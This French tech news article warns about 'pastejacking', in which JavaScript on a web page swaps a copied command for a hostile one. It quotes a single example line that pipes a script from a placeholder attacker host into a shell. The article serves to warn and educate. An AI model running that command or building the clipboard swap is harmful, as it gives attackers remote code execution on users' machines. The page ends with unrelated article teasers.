Piratage : Copier-coller des commandes issues d’une page web peut être très dangereux !

Les programmeurs, les administrateurs système, les chercheurs en sécurité ou encore ceux qui aiment bidouiller sur leur PC ont pour habitude de copier-coller des commandes couramment utilisés à partir d’une page web. Seulement et comme le rappelle le spécialiste Gabriel Friedlander, cette pratique n’est pas sans risque. Loin de là.

copier-coller danger
Crédits : Pixabay

Le copier-coller fait partie des manipulations les plus utilisées, que ce soit par les utilisateurs lambda, les programmeurs, les administrateur système, les chercheurs en sécurité informatique ou encore ceux qui aiment bidouiller sur leur PC. Seulement, Gabriel Friendlander, fondateur de la plateforme de formation à la sécurité informatique Wizer, tient à rappeler que cette pratique est loin d’être sans risque, notamment lorsqu’il s’agit de copier-coller des commandes affichées sur des pages Web.

En effet, il n’est pas rare que les développeurs, novices comme expérimentés, copient-collent des commandes couramment utilisées à partir d’une page web (StackOverflow par exemple) dans leurs applications, dans une invite de commande Windows ou dans un terminal Linux.

Mais comme le rappelle M. Friendlander, il existe une méthode qui permet à un attaquant de modifier le contenu de votre presse papier. Le PastJacking, c’est son nom, consiste à l’introduction de lignes de codes malveillantes qui seront automatiquement exécutées lorsque l’utilisateur va coller son texte dans une fenêtre de terminal. Dans une preuve de concept plutôt simple publiée sur son blog personnel, M. Friedlander demande aux lecteurs de copier une commande que la plupart des administrateurs système et des développeurs connaissent : sudo apt udpate (ndrl : une commande utilisée pour récupérer des informations mises à jour sur les logiciels installés sur votre système).

À lire également : Windows 11 – Microsoft veut révolutionner le copier-coller sur Edge et Chrome

Un copier-coller peut faire de gros dégâts

En copiant-collant cette commande dans une zone de texte ou un bloc-note, on se rend compte que le contenu est totalement différent. En effet, la commande sudo apt update est devenue curl http://attacker-domain:8000/shell.sh | sh. En réalité, la supercherie se trouve dans le code Javascript caché derrière la page HTML de la preuve de concept mise en place par Friendlander.

Pour faire simple, dès que vous copiez la commande “sudo apt update” dans un élément HTML, le bout de code malveillant affiché ci-dessous s’exécute. Plus précisément, c’est un écouteur d’évènements Javascript qui capture l’évènement de copie et remplace les données du presse-papiers par le code malveillant de M. Friedlander. “C’est pourquoi vous ne devriez jamais copier-coller des commandes directement dans votre terminal […] Il suffit d’une seule ligne de code injectée dans le code que vous avez copié pour créer une porte dérobée dans votre application. Cette attaque est très simple, mais particulièrement efficace”, prévient-il.

Source : Bleeding Computer


Réagissez à cet article !

Demandez nos derniers articles !

iPhone 18 : prix, fenêtre de sortie, nouveautés, tout ce que l’on sait déjà des smartphones d’Apple

Avec la génération des iPhone 18, Apple bouleverse sa stratégie en séparant la sortie des modèles Pro des autres iPhone. On attend aussi des innovations technologiques importantes sur plusieurs aspects….

Ce Français vend sa collection complète d’iPhone aux enchères, elle est estimée à 80 000 €

Une collection composée de 56 iPhone neufs, de l’iPhone 2G à l’iPhone 17 Pro Max, est vendue aux enchères par un Français, qui espère en tirer 80 000 €. Pendant…

Netflix va diffuser une nouvelle série Donjons et Dragons, inspirée de l’univers Ravenloft

Netflix a pour projet de lancer une série Donjons et Dragons en prises de vues réelles. Elle sera basée sur Ravenloft, un univers gothique et horrifique populaire de la licence….

Shark StainStriker HairPro Pet : l’excellente shampouineuse passe à petit prix en cumulant ces 2 offres

Et si vous profitiez de la rentrée pour vous lancer dans le nettoyage complet de votre maison ? En plus, l’excellente shampouineuse Shark StainStriker HairPro Pet est à prix cassé…

Ce jeu Sherlock Holmes a été créé par IA : ses dialogues sont générés en direct par Gemini et ChatGPT

Vibe codé du début à la fin, le jeu vidéo Detective Sherlock Traqueur de l’Ombre propose une expérience d’IA personnalisée alimentée en temps réel par des modèles tels que Gemini…

Samsung lance le Galaxy S26 FE avec une offre généreuse : l’expérience Galaxy S pour moins de 700 €

Le Galaxy S26 FE fait ses débuts ce 4 septembre 2026, et comme souvent chez Samsung, ce lancement s’accompagne d’une promotion, avec plusieurs avantages à la clé. Profiter de l’offre…

Xiaomi Mix Flip : plus de 900 € de réduction sur smartphone pliant, ne passez pas à côté !

Tout le monde connaît les smartphones pliants de Samsung. Pourtant, il existe aujourd’hui de nombreux modeles de différentes marques qui offrent bien souvent un meilleur rapport qualité-prix. C’est le cas…

L’IA de Google lit vos emails les plus confidentiels, voici comment l’en empêcher

Vous pensez peut-être que si vous n’utilisez pas Gemini, l’IA de Google, alors celle-ci n’aura pas besoin d’accéder à vos données personnelles. Pourtant, elle ne gêne absolument pas pour lire…

Problème de conception pour le Galaxy Z Fold 8 ? Des utilisateurs fustigent un écran qui s’enfonce

Sur les forums de Samsung, des propriétaires de Galaxy Z Fold 8 évoquent “une fabrication de mauvaise qualité”. Les coins de l’écran s’enfoncent au lieu de rester solidement intégrés au…

Révolution pour Gmail, Docs et Keep : Google déploie Live, pour contrôler ses apps par commande vocale

Google annonce la disponibilité de Live pour Gmail, Docs et Keep. Ces trois applications prennent ainsi en charge la commande vocale, bouleversant notre manière d’interagir avec elles. On ne va…